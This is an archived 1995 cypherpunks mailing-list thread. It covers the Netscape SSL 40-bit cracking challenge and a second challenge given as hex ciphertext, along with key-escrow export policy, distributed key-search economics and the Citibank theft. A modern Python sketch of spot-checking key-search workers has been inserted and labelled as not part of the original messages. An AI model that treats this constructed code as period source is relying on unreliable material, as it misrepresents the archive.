From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Fri, 18 Aug 95 20:04:41 PDT
To: cypherpunks@toad.com
Subject: Anonymous certificates
Message-ID: <01HU8HTP8R4O8ZJ4DW@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Fri, 18 Aug 1995 14:47:55 -0400 (EDT)
>From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
>Subject: Certificates/Anonymity/Policy/True Names

>Now the issue arises as to whether one should allow the CA
>to issue certificates to pseudonyms where it has *no record* of the real
>identity of the person proffering the key pair.
>Is there any reason why a person would want such a certificate?  In other
>words, given that the recipient of a digital signature will easily be
>able to check the value of the certificate (nil), won't the
>transaction/communication be in all ways identical to one where there was
>no certificate at all.
>So is anything of value lost by prohibiting such
>a certificate?

There are definitely cases where something is lost by prohibiting
that kind of certificate.  For example, there may be cases where a
certified key gives someone some right that doesn't need any
further identification, such as a right to run up $100 in phone
bills, or a right to receive a year's subscription to cp-lite.  As
long as the person has paid for that right, who cares who he or she
is?  In other words, you may wind up sometimes binding a key to a
function, rather than a person.

>A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
>Associate Professor of Law | mfroomki@umiami.ir.miami.edu
>U. Miami School of Law     |
>P.O. Box 248087            | It's hot here.  And humid.
>Coral Gables, FL 33124 USA |

   --John Kelsey, jmkelsey@delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDVGbUHx57Ag8goBAQHO/AP+IM1YQSXZWaysjDALtOljqUEiyiCBA3EM
Wxd8dp0dVrXKEii1Ima/xLHMKY4P0fvwT3oQl4x+mMo+ED2lNHo5GOUhgkE1tOZ8
6JfnUS6+l1Y4r14Aq0eMLljrOKFBDDUxewJTRaz36awWNr9W0tEcnnKv9NwQMU//
CCKR6L5fekI=
=EI6V
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 18 Aug 95 15:06:41 PDT
To: cypherpunks@toad.com
Subject: WhiSSLing in the Dark
Message-ID: <199508182201.AAA27435@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Netscape Encrypted Data Cracked


Tokyo, Japan, Aug. 18 (NB) -- Two computer users have
managed to break Netscape's Secure Sockets Layer (SSL)
encryption code in response to a challenge posted to the
Internet. But far from scaring people away from using the
system for online purchases, the results could reassure
people of the safety.

In mid July Hal Finney, a US computer user, posted data
in an Internet message that he recorded when he sent an
order, containing a fake name and credit card details, to
Netscape's own computer. Setting a task for the hacking
community, he wrote, "The challenge is to break the
encryption and recover the name and address info I
entered in the form and sent securely to Netscape."

Early this week, news came from Damien Doligez, a French
computer user, that he had cracked the code and revealed
the contents of the message. Several hours later a
message from an American team also claimed the same feat,
actually cracking it two hours earlier than Doligez.

While the results look damaging on the surface, Netscape,
and Doligez, pointed out the amount of computer
processing power needed to hack just one message and the
difficulty in repeating the process.

Roseanne Siino of Netscape told Newsbytes, "The real
issue is whether this compromises security on the net. He
used 120 computers for 8 days just to crack one message."
Siino points out that to break into another message would
require another eight days at the same 120 workstations
and 2 parallel computers.

In home computer terms, Doligez guesses a network of
about 80 Intel Pentium-based machines would be equivalent
to the system he had access to via his workplace, INRIA
in Paris, and computers at Ecole Polytechnique and ENS.

Netscape estimates the total cost of this computing time
at around $10,000, meaning there are many more economical
ways of getting credit cards numbers than hacking into
Netscape SSL messages.

Doligez agrees, writing on his home page: "The technical
implications are almost zero. Everybody who understands
the technical details knew perfectly well that this was
do-able and even easy. You have to understand what
happened exactly. I did not break SSL itself. I did only
break one SSL session that used the weakest algorithm
available in SSL. If I want to break another session, it
will cost another 8 days of all my machines."

The vulnerability of the encryption system is shown by
its international use. The coding system available via
Netscape software from the Internet makes use of a 40-bit
encryption key. A stronger version, using a 128-bit key,
is available to US citizens but restricted from export
outside the United States by government regulations.

Netscape's Siino explained the US government allows
export of the lower security version "because they can
break it."

There are some hopes that this demonstration will help
persuade the US government to lift export restrictions on
some harder-to-crack versions of the code.

Netscape is currently developing a new Secure Courier
code which just encrypts the financial data in the
messages using 56-bit keys. Siino explained, "You can
export over 40-bit keys for a specific application." The
new system should be available early next year.

Many companies working on secure transaction systems hope
the much more secure 128-bit code version of the system
will be available for export eventually. This is said to
be almost unbreakable, requiring a trillion times more
processing power to crack than the 40-bit version.

Internet users can view a copy of the original challenge,
access Doligez's home page with details of his result,
get copies of the program used to crack the code and read
Netscape's response to the news through a special section
at Netscape,

http://home.netscape.com/newsref/std/key_challenge.html

Press contacts : Roseanne Siino, Netscape,
+1-415-528-2619 , Internet email roseanne@netscape.com;
Damien Doligez, Internet email damien.doligez@inria.fr ;
Hal Finney, Internet email hfinney@shell.portal.com)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 19 Aug 95 01:02:31 PDT
To: cypherpunks@toad.com
Subject: Re: Economic Model for Key Cracking
Message-ID: <199508190800.BAA26793@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:29 PM 8/18/95 -0600, howard@cs.ualberta.ca wrote:
> Distribute work when a request is received.
> When the final results come back, pay the worker e-cash.
>
>We need to make sure that someone did do the work honestly, but I don't know
>how to check this (other than doing the work yourself to confirm the results,
>but this defeats the whole point of the system). 

For the usual NP-hard problems, including keycracking, checking the answer
once you have it is easy - the hard part is finding the answer.
Another way to look at it is that most of the work is throwing away the
2**N-1 keys that aren't correct, and if you've got one correct key you don't
need to know about the rest (except in special cases where there are multiple
keys that work, but usually you don't care about that.)

Most people are honest, except Bad Guys.  

The honesty problem is more serious for negative results - if somebody says
"Range N1-N2 doesn't have the key", they could be honest, or they could
be a Bad Guy who knows that the key really _is_ in that range and wants
to prevent you from searching it, or they could be a scammer who wants to
get paid for searching but didn't actually do the work.  If people are
willing to be paid in lottery-mode (only the person who finds the key gets
paid), then honesty's not a problem.  Otherwise, only hire honest people
(plus Bad Guys), and if they don't find the key after the first sweep, try
again (switching off ranges so one Bad Guy doesn't get to lie about the same
range twice.)

Alternatively, you could do a model where everybody gets paid, but only after
the answer is found, which discourages scammers (since they don't get paid if
they lie about searching the range that has the real key.)  If a Bad Guy lies
about the key not being in his range, people do have an incentive to look for it
if the first pass fails, and have an incentive to finger him if they do find 
the key on a later pass.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

	   "The fat man rocks out
	Hinges fall off Heaven's door
	   "Come on in," says Bill"    Wavy Gravy's haiku for Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 19 Aug 95 01:02:33 PDT
To: cypherpunks@toad.com
Subject: Re: Exportable if Escrowed
Message-ID: <199508190800.BAA26798@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


PGP inherently provides master-key service, which can be used for escrow.
On a normal PGP message, there's a session key which the sender knows,
and a copy of the session key is provided to the recipient, who can open
it on the condition that he has the genuine private key.  That's fairly
close to _real_ escrow - it's certainly closer than Clipper's Master-Key stuff.
(And it has a lot more masters :-)

If PGP message-senders want to do so, they can use multiple recipients
on a given message, so the key is accessible to a third party trusted by
the sender (the legitimate recipient already can give it to trusted parties.)
(Typically a sender might use encrypt-to-self to retain the key for later use.)

An amusing feature to add to PGP (using the 3.0 toolkits when available)
would be a session-key-splitting feature, which uses Shamir M/N sharing or
a simple two-way split and encrypts the splits with different people's
public keys, so that you could give them to semi-trusted parties.

Of course, the Clintonites' proposal of "We'll let you use slightly less wimpy
encryption in return for GAK" is really offensive - if they've got GAK,
it doesn't matter if the keys are 64000 bits long, since they'll have them.
Smokescreen.

On the other hand, master GAK keys don't fit well into a Web of Trust -
you'd essentially have to require that people only send mail to keys that are
signed by an escrow service, and people wouldn't always do that if they had
a choice - to enforce GAK, you either need to limit the sender's encryption
software (unrealistic) or the recipient's decryption software (unrealistic),
probably by requiring exportable products to use a specific hierarchical
key-service.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

	   "The fat man rocks out
	Hinges fall off Heaven's door
	   "Come on in," says Bill"    Wavy Gravy's haiku for Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <zeus@pinsight.com>
Date: Sat, 19 Aug 95 01:49:29 PDT
To: "cypherpunks@toad.com>
Subject: NSA's black hole event detector
Message-ID: <199508190849.BAA25410@utopia.pinsight.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --

>On July 19, Gerald Ollman and Robert Wayne, two researchers from the
>University of Maryland geophysics department were detained in Fort Meade,
>Maryland, apparently by agents of the National Security Agency, whilst
>taking measurements of the Earth's gravitational field. 

So, the NSA has a microscopic black hole they're modulating with a fine
particle stream, so gravity wave detectors can receive messages through 
the Earth using hyper-amplified optical data cubes. These messages 
could not be jammed by e-m waves (OK, terawatts at the receiver maybe).

According to Communications Quarterly, such black hole events could 
arguably support a compressed real-time digital voice channel. This 
sounds like the "heavy hand" devices in the new Free Space 
science-fiction anthology.

What? You haven't read it? Neither has anyone else, but when it finally
comes out you'll get to read my story about blue helmeted Earth Union
troops battling a neo-Confederate militia 20 years after the War of 
Annexation. Nanotech weapons, makeshift missiles, home-brew spacecraft.

An important part of a balanced breakfast.

Kent
--
"Put pages for your business on the World Wide Web, just $5 per month!"
J. Kent Hastings -- zeus@pinsight.com -- http://www.pinsight.com/~zeus/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 18 Aug 95 18:40:09 PDT
To: cypherpunks@toad.com
Subject: Red Shift
Message-ID: <199508190140.DAA01774@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Citibank Theft


New York (AP) -- Russian computer hackers broke into a Citibank
electronic money transfer system and stole more than $10 million
before they were caught, according to newly-unsealed court
documents. The money was shifted from Citibank to accounts in
Finland, Russia, Germany, the Netherlands, the United States,
Israel and Switzerland, FBI agent Steven Garfinkel said. Citibank
said six people have been arrested in the scheme and that none of
its clients lost money.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 19 Aug 95 03:40:26 PDT
To: cypherpunks@toad.com
Subject: So, NSA can break 64-bit keys
Message-ID: <199508191040.GAA20763@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


The WSJ article on Clipper II (The Next Day) was the best one.  Particularly
this line:

"Clint Brooks, a technical advisor with the NSA [said] that continued
[64-bit] limits [on key length] were needed because officials were "uneasy"
about the possibility that software could be altered so that the key would
no longer be accessible to law-enforcement officials."

This must mean that the Feds figure that by the time this turkey gets around
to actually flying (sometime well after the Clinton administration), 64-bit
keys will be (are) vulnerable.

I guess this means no source code.  Are there any software encryption
systems that can't be modified after the fact?

DCF

"Course, the source code could be released after key escrow has occurred."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 19 Aug 95 04:36:27 PDT
To: cypherpunks@toad.com
Subject: HAQ_kof
Message-ID: <199508191136.HAA02404@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-19-95. NYPaper:


   Whitfield Diffie OpEd: "Washington's Computer Insecurity."

      The Federal Government has refused to allow companies to
      export strong encryption systems, insisting that
      cryptography is a military weapon. If the Administration
      does not fundamentally alter its position, it is likely
      that our high-tech industries, which sell more than half
      their products outside the country, will continue to be
      forced to sell programs with weak security systems. This
      will pave the way for foreign companies to grab what is
      expected to become a huge market for properly
      safeguarded computer communications.


   "Citibank Fraud Case Raises Computer Security Questions."

      A $10 million computer fraud against Citibank appeared
      to be the first successful penetration by a hacker into
      the systems that transfer trillions of dollars a day
      around the world's banks. New details of the case were
      disclosed as a Federal complaint was unsealed in
      Manhattan. The hackers were accused of breaking into
      Citibank's cash management system, a network that allows
      its corporate customers to transfer money to any bank
      account in the world. Banking experts said similar
      break-ins were bound to occur at a time when more
      powerful personal computers are available. Since the
      break-in, Citibank has required customers to use an
      electronic device that creates a new password for every
      transfer.


   Two: HAQ_kof (11kb)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 19 Aug 95 08:28:19 PDT
To: cypherpunks@toad.com
Subject: SSL Challenge #2
Message-ID: <199508191525.IAA16924@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


OK, here is another "SSL challenge" for your cracking pleasure.  I hope
this time people will be able to put together more of a group effort to
show how large numbers of less powerful machines can crack these keys.

I am leaving for a week in the Colorado mountains in a few hours so I
don't have time now to format this nicely.  However the necessary
information should all be here.

This one includes a fake credit card number as well as other fake
information.  As with the earlier challenge, this is all data I created
myself and captured using the actual Macintosh Netscape browser.

Note that the breakdown by messages is based on the packetizing done in
the TCP communication.  There may not be an exact correspondence between
these packet breakpoints and the "logical packets" used in the SSL
transaction.  Particularly for the long sequence of packets which come
back from the server towards the end (because it rejected the transaction
so is re-sending the form data, I think) you will need to check the SSL
length fields to see where the SSL packets start and end.  I am not sure
why there is so much data sent from the server at the end, but whoever
cracks it can presumably find out.

Good luck!

August 19, 1995
Hal Finney




First message from client

0x80 0x1c 0x01 0x00 0x02 0x00 0x03 0x00 0x00 0x00 0x10 0x02 0x00 0x80 0x07 0xea
0x7b 0x9d 0x65 0xeb 0x61 0xfa 0xbb 0x41 0x74 0xe8 0x45 0x3a 0x5f 0xc6 

first message from server


Second message from client


Second message from server

0x80 0x21 0x9a 0xc5 0xf7 0xd1 0x6a 0x5b 0x26 0x43 0x57 0x67 0x65 0xb6 0x3f 0x9a
0xe3 0x82 0x00 0x65 0x99 0xb6 0xd2 0xf2 0xa7 0x36 0xa0 0x7d 0xd9 0x94 0xcf 0xe2
0x33 0xb2 0x1b 

Third message from server

0x80 0x21 0x38 0x4f 0x4d 0x99 0x31 0x33 0xc9 0x72 0x0f 0xf9 0xb7 0x7f 0xd4 0x02
0x4b 0x4a 0x3b 0xdb 0x4f 0xc9 0x04 0xa4 0x09 0xd1 0x04 0xbe 0xee 0xb0 0xe6 0xed
0x7f 0x18 0x17 

Third message from client

0x80 0x21 0x98 0xdb 0x86 0xf2 0xe0 0x67 0x8a 0x2f 0x04 0x5b 0xf3 0xf0 0x78 0xe1
0x96 0x83 0x34 0x38 0x2f 0x22 0x45 0x61 0xa0 0xac 0x7d 0x9f 0xa8 0xcc 0x16 0xec
0xd7 0x33 0xb9 

Fourth message from client


Fourth message from server:


Next message from server


Next message from server


Next message from server:


Next message from server:


Next message from server:

0xac 0x38 0x58 0x25 0x57 0x19 0x79 0x6c 0x16 0x8a 0x10 0x63 0x42 0x55 0x09 0xcb
0x26 0x6e 0xb7 0x34 0x67 0xef 0x1d 0xff 0x7a 0x7b 0xaa 0x98 0x4a 0xf0 0x50 0x2b
0xe2 0x90 0x7e 0x92 0x83 0x24 0x9a 0x33 0x3f 0x6c 0x80 0x49 0x9c 0x82 0x8c 0x86
0xc3 0x1d 0xc7 0xbc 0x0c 0xee 0x9c 0x3e 0x49 0x9b 0xa3 0xfc 0x62 0x4b 0xd0 0x81
0xd2 0x5e 0x14 0x58 0x8e 0xbd 0x22 0xa3 0x02 0xfc 0x7f 0x48 0xa3 0x34 0xf0 0xbf
0x4b 0x52 0xb9 0x46 0x60 0x8b 0xda 0x1b 0xf8 0xc8 0x3d 0x28 0x9e 0xc6 0xe6 0x97
0x9d 0x78 0x0c 0x86 0x83 0x65 0x33 0xa5 0x51 0x0b 0xdc 0x60 0x27 0x2f 0x3f 0x37
0x1d 0xf5 0x32 0x33 0x76 0xd6 0xa6 0x97 0x0a 0xfc 0x9c 0x29 0xe1 0x67 0xb6 0x3c
0x74 0x57 0x01 0xc1 0xe9 0x69 0x9c 0x79 0xe5 0x75 0xdd 0x7a 0x2b 0x53 0xea 0x87
0x6a 0x94 0x1d 0x8a 0x0c 0x49 0x9a 0x15 0x1f 0x37 0x63 0x1f 0x98 0xc1 0x1c 0x5e
0x90 0x0c 0xae 0xee 0xb7 0x65 0xd3 0x1b 0xf2 0xf5 0x33 0x46 0x2e 0xaf 0x89 0x35
0x01 0x3a 0x8d 0x33 0x6e 0x39 0xd1 0xe7 0xf7 0xec 0x53 0xb9 0xb5 0xfd 0x46 0xbe
0xc7 0xe2 0xec 0x4e 0x7c 0xe3 0xd1 0x7d 0xe4 0xbd 0x8b 0x1e 0x0d 0x9f 0x7b 0xcd
0x5a 0x47 0x0f 0x0a 0x73 0x8c 0x7a 0x2f 0x5e 0xa4 0xf7 0xf7 0x5a 0x96 0x4d 0x7d

Next message from server:


Next message from server:


Next message from server:


Next message from server:


This completes the communication.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Lane <blane@guetech.com>
Date: Sat, 19 Aug 95 10:43:46 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: SSL challenge and escrows
In-Reply-To: <9508181635.AA23177@all.net>
Message-ID: <Pine.LNX.3.91.950819100112.1510D-100000@guetech.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 18 Aug 1995, Dr. Frederick B. Cohen wrote:

> I think a lot of people miss the distinction between automated message
> cracking and dumpster diving.  Dumpster diving is not free.  It costs at
> least a dollar each to get credit card slips by dumpster diving. 

  I think people have been forgetting something else. Getting caught.

  If I dive dumpsters, grab receipts from where I work, etc., the chances
of me being caught, or linked to use of the CC#s, are much higher than if I
scam them from somewhere on the net, using a cracked account (or several)
on machines all over the world.

  Another thought is an unethical ISP. They either sniff the SSL
transactions to their web server, or take the numbers from the users'
directories. If discovered, they blame it on 'hackers'.

  What happens to the SSL encrypted data after it is received by the server?

    Brian

-----------------------------------------------------------------------------
"A little rebellion now and then is a good thing."   |   PGP Key and .plan
 -- President Thomas Jefferson                       | email Subj: blane-info
=============================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Graham Toal <gtoal@gtoal.com>
Date: Sat, 19 Aug 95 08:53:57 PDT
To: cypherpunks@toad.com
Subject: Has anyone written a 'secure' (ahem) html server?
Message-ID: <199508191549.KAA25681@fajita.vt.com>
MIME-Version: 1.0
Content-Type: text/plain


Congrats to the guys who broke the netscape encryption.  Now... as
someone who would like to use 'lite' encryption for a few non-critical
purposes, has anyone taken the code they must have worked out
to do the crack and fed it back in to a public domain server?  I
*really* don't want to pay Netscape 1000's just to play around
with this stuff...  (I presume the algorithms are public and
there wouldn't be any legal problem with this...)

G
PS Yes, I'm back.  Was avoiding all cypherpunkly things until I
got my green card.  First thing I did when it arrived in the mail
was log in to MIT and get an official release of pgp :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Lane <blane@guetech.com>
Date: Sat, 19 Aug 95 12:17:33 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Apologies
Message-ID: <Pine.LNX.3.91.950819113714.2807A-100000@guetech.com>
MIME-Version: 1.0
Content-Type: text/plain



  Sorry, the group of SSL related files wasn't supposed to go to the
list. It's been one of those weeks, you know?

   Brian

-----------------------------------------------------------------------------
"A little rebellion now and then is a good thing."   |   PGP Key and .plan
 -- President Thomas Jefferson                       | email Subj: blane-info
=============================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 19 Aug 95 08:45:12 PDT
To: cypherpunks@toad.com
Subject: (Fwd) 1995 Nanotechnology Conference
Message-ID: <199508191545.LAA16285@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Fourth Foresight Conference on Molecular Nanotechnology


SUMMARY: The conference will be held November 9-11, 1995, in 
Palo Alto.


It is a multidisciplinary meeting on molecular nanotechnology,
that is, thorough three-dimensional structural control of
materials and devices at the molecular level.


Attendees will include chemists, materials scientists,
physicists, engineers, and computer scientists interested in
learning about the field and participating in its development.


For further information, contact


     foresight@cup.portal.com


or see the Web page


     ftp://ftp.parc.xerox.com/pub/nano/nano4.html.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Sat, 19 Aug 95 09:21:27 PDT
To: cypherpunks@toad.com
Subject: Re: Export policy change
Message-ID: <199508191621.MAA09036@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Fri, 18 Aug 1995 23:03:47 -0400 (EDT)
>From: JMKELSEY@delphi.com
>Subject: Export policy change

>I think this is an important and somewhat subtle political move on
>the part of the administration.  If they can get at least a few
>large businesses (the ones who buy into the key-escrow scheme) on
>their side, by making it in their economic interests for everyone
>to use escrowed crypto, they will have manufactured some
>potentially powerful allies in the computer industry.  

That's not too far from Steve Walker's published intention with the CKE
project.

See:  ftp://ftp.tis.com/pub/crypto/drc/papers/  and below.

 - Carl



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 19 Aug 95 12:39:55 PDT
To: cypherpunks@toad.com
Subject: Re: Economic Model for Key Cracking
Message-ID: <ac5b5baa2202100424d5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:29 PM 8/18/95, Howard Cheng wrote:

>We need to make sure that someone did do the work honestly, but I don't know
>how to check this (other than doing the work yourself to confirm the results,
>but this defeats the whole point of the system).  Perhaps we should require
>that people buy the work first, and when they report the results, they get
>the money back + some profits.

The "abstract protocol" that works in many economic transactions is simple:
_spot checks_. That is, random samples. You don't have to do all the work
yourself.

"Quality Control" (QC) is based on this. The "Inspected By: Foobar" tags on
manufactured items provided traceability/feedback to a manufacturer--a
reputation system, if you will. Lot numbers, seals, etc.

Yes, this is an obvious point, but it's interesting because the "spot
check" is a kind of protocol that is almost like "cut and choose" in its
crypto connotations.

>Assuming everyone is honest, I am sure many people in businesses

As the Great Leader once said, "Trust, but verify."

There is no reason to make assumptions about honesty: just spot check the
work and downgrade the reputation of anyone who slacks off or is deceitful.

(This "web of distrust," in terms of black marks in reputations, is as
important as the web of trust. The same, really. And yet another reason why
one doesn't want government=root, as they would undoubtedly frown on
anything that was "discriminatory" or "hurtful to the differently abled.")

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."
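

[Added example, not part of the original message or the thread: a sketch of the spot-check idea discussed above, applied to a distributed key search. The toy keyspace, the SHA-256 stand-in for a trial decryption, the worker names and the per-unit residue (a digest over all trial outputs, which is what makes a "not found" report checkable) are assumptions of this example.]

```python
import hashlib
import math
import random

UNIT_SIZE = 256   # keys per work unit (toy size, constructed for this example)
N_UNITS = 32      # 32 * 256 = 8192 keys in the toy keyspace


def trial(key, challenge):
    """Stand-in for one trial decryption (assumption: SHA-256 of key || challenge)."""
    return hashlib.sha256(key.to_bytes(4, "big") + challenge).digest()


def search_unit(unit, challenge, target):
    """Search one work unit honestly; return (found_key_or_None, residue)."""
    residue = hashlib.sha256()
    found = None
    for key in range(unit * UNIT_SIZE, (unit + 1) * UNIT_SIZE):
        out = trial(key, challenge)
        residue.update(out)          # residue depends on every trial in the unit
        if out == target:
            found = key
    return found, residue.hexdigest()


def honest_worker(unit, challenge, target):
    return search_unit(unit, challenge, target)


def slacker_worker(unit, challenge, target):
    """Claims 'not found' without searching; the residue is made up."""
    return None, hashlib.sha256(b"unit %d" % unit).hexdigest()


def spot_check(reports, challenge, target, checks_per_worker, rng):
    """Redo a random sample of each worker's units; return black marks per worker.

    reports maps unit -> (worker_name, found, residue).
    """
    by_worker = {}
    for unit, (name, _, _) in reports.items():
        by_worker.setdefault(name, []).append(unit)
    marks = {name: 0 for name in by_worker}
    for name, units in by_worker.items():
        sample = rng.sample(sorted(units), min(checks_per_worker, len(units)))
        for unit in sample:
            _, found, residue = reports[unit]
            if (found, residue) != search_unit(unit, challenge, target):
                marks[name] += 1     # downgrade this worker's reputation
    return marks


def detection_probability(n_units, n_faked, n_checked):
    """Chance that checking n_checked of a worker's n_units hits a faked one."""
    clean = math.comb(n_units - n_faked, n_checked)
    return 1 - clean / math.comb(n_units, n_checked)


def demo(seed=1995):
    rng = random.Random(seed)
    challenge = b"constructed challenge"
    secret_key = 5000                # lies in unit 19, which goes to the slacker
    target = trial(secret_key, challenge)
    workers = {"alice": honest_worker, "bob": slacker_worker}
    reports = {}
    for unit in range(N_UNITS):
        name = "alice" if unit % 2 == 0 else "bob"
        found, residue = workers[name](unit, challenge, target)
        reports[unit] = (name, found, residue)
    marks = spot_check(reports, challenge, target, 4, rng)
    return marks, reports


if __name__ == "__main__":
    marks, reports = demo()
    print("black marks:", marks)
    print("key reported by workers:", [r[1] for r in reports.values() if r[1] is not None])
    print("P(detect 4 faked of 16 with 4 checks):", detection_probability(16, 4, 4))
```
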






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 19 Aug 95 12:40:00 PDT
To: cypherpunks@toad.com
Subject: Liability for Key Cracking in Idle Hours?
Message-ID: <ac5b5ee423021004e6b5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I have a feeling that many businesses will set policies to try to stop
their workstations and computers from being used in key cracking attempts.

They don't now, mainly because for one thing they don't even know about it,
and for another thing, it would be a headache to try to administer such a
ban.

However, the notion that "IBM Corporation" or "Bank of America" will say
"Sure, use our idle CPU time to try to crack keys!" seems farfetched.

California is one jurisdiction that has made "hacking" a crime. Not clear
what this means, but some construe it to mean that any attempts to break
into the account of another--or crack a key--is a crime. Not tested in
court, etc. But will Bank of America want to decide whether a key cracking
effort is a "legitimate academic exercise" (such as the SSL Challenge was,
as it involved no damage to any party) or an attempt to use their computers
to break into an account or to otherwise compromise a transaction?

(I am NOT saying that key-cracking = hacking, in the negative sense of
"hacking," but I can certainly imagine cases where it would be. And when
Microsoft Network comes out, soon, I think a lot of people will want to
poke holes in its security, as we've already seen a bit of. Corporations
will not likely take kindly to being involved in something like this.)

Thus, I expect something in between the extremes:

-- corporations fear liability and will not openly encourage this, even to
make a few extra bucks (and it's not at all clear how such bucks would be
made, or if big companies would give a rat's ass about earning a few
dollars a night....)

-- but people with access to these machines will continue to use them for
key cracking, factoring, etc. challenges.

Could I be wrong in this? Sure. Maybe companies will not care. I doubt
this, though.

Damien may be able to tell us if Ecole Polytechnique has raised any
questions about his highly-publicized attack on the SSL Challenge key. I
will _speculate_ that the normally-security-conscious French are
considering policies against this. After all, this is one of the countries
that bans private possession of strong crypto. (Or, as a French computer
scientist told me recently, "Sure, one can apply for a license for
crypto...the procedure is the same as applying for a license for your own
private Exocet missile.")


--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Sat, 19 Aug 95 11:50:26 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: 64 bit keys breakable by the NSA or just some random key length?
Message-ID: <Pine.LNX.3.91.950819123758.27374A-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

cpunks,

i was thinking about the recent Clinton/LEA proposal regarding exportable 
crypto.  the new rules would allow 64 bit keys to be exported, as long
as the master key was made available through some key escrow service.

now, we know it is relatively easy to break a 40 bit key.
additionally, we know it is nearly impossible to break 128 bits.  i'm
not so sure how hard 64 bits is (need to brush up on that ol'
mathematics some time...).

why did the govt pick 64 bits?  is this length still within the range
of the NSA if they really wanted to read something but didn't feel the
need or want the exposure of obtaining a key from escrow?

i'm curious if anyone thinks this gives us a little more info on the
capabilities of the NSA regarding brute forcing a key.  additionally,
since this *is* an escrow system, why didn't the gov't just go with
the unbreakable 128 bit key length?  

- -pjf


patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDYyb03Qo/lG0AH5AQGhDwP/c2NmiU3IwQSAPuYyFgLG3o8Tc+8i9v7b
j8+vdT9wwmBM0hMXtIya6Dnb9hHo+oyBJkL+70N44sV7gy+J6LlZQcY/dNICAdD5
lEJ67YEfKp5Mb010MljsEcwMEIhjZ/IWrhSZipg4rkfIutXCIj6iNvOtOgi9WjKW
wz1j7FimJpI=
=1j3L
-----END PGP SIGNATURE-----
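
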